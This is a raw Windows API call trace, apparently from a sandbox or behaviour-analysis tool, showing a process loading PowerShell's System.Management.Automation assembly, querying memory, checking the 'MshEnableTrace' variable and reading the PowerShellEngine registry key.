	[0409.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.556] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.561] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0410.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.561] CoTaskMemFree (pv=0x147db0) 
	[0410.565] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.572] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0410.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.572] CoTaskMemFree (pv=0x147db0) 
	[0410.574] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0410.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.574] CoTaskMemFree (pv=0x147db0) 
	[0410.577] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0410.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.577] CoTaskMemFree (pv=0x147db0) 
	[0410.584] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0410.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.584] CoTaskMemFree (pv=0x147db0) 
	[0410.589] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0410.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.590] CoTaskMemFree (pv=0x147db0) 
	[0410.591] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0410.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.591] CoTaskMemFree (pv=0x147db0) 
	[0411.001] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.003] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.377] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.407] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0411.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0411.408] CoTaskMemFree (pv=0x147db0) 
	[0412.078] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x147ec0
	[0412.079] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x147fd0
	[0413.141] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.935] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.938] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.938] VirtualQuery (in: lpAddress=0x28a640, lpBuffer=0x28b500, dwLength=0x30 | out: lpBuffer=0x28b500*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.964] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.964] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.965] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.965] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.966] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.967] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.967] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.968] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.968] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.968] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.968] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.969] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.970] VirtualQuery (in: lpAddress=0x28bbf0, lpBuffer=0x28cab0, dwLength=0x30 | out: lpBuffer=0x28cab0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.973] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0413.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.973] CoTaskMemFree (pv=0x1480e0) 
	[0413.977] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0413.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.977] CoTaskMemFree (pv=0x1480e0) 
	[0413.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.681] VirtualQuery (in: lpAddress=0x28bea0, lpBuffer=0x28cd60, dwLength=0x30 | out: lpBuffer=0x28cd60*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0414.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0414.687] VirtualQuery (in: lpAddress=0x28bea0, lpBuffer=0x28cd60, dwLength=0x30 | out: lpBuffer=0x28cd60*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0414.687] VirtualQuery (in: lpAddress=0x28b6f0, lpBuffer=0x28c5b0, dwLength=0x30 | out: lpBuffer=0x28c5b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0414.687] VirtualQuery (in: lpAddress=0x28b6f0, lpBuffer=0x28c5b0, dwLength=0x30 | out: lpBuffer=0x28c5b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0414.688] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dcf8 | out: phkResult=0x28dcf8*=0x33c) returned 0x0
	[0414.688] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc7c, lpData=0x0, lpcbData=0x28dc78*=0x0 | out: lpType=0x28dc7c*=0x1, lpData=0x0, lpcbData=0x28dc78*=0x56) returned 0x0
	[0414.688] CoTaskMemAlloc (cb=0x5a) returned 0x1b7901f0
	[0414.688] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc4c, lpData=0x1b7901f0, lpcbData=0x28dc48*=0x56 | out: lpType=0x28dc4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28dc48*=0x56) returned 0x0
	[0414.688] CoTaskMemFree (pv=0x1b7901f0) 
	[0414.689] RegCloseKey (hKey=0x33c) returned 0x0
	[0414.689] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dcf8 | out: phkResult=0x28dcf8*=0x33c) returned 0x0
	[0414.689] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc7c, lpData=0x0, lpcbData=0x28dc78*=0x0 | out: lpType=0x28dc7c*=0x1, lpData=0x0, lpcbData=0x28dc78*=0x56) returned 0x0
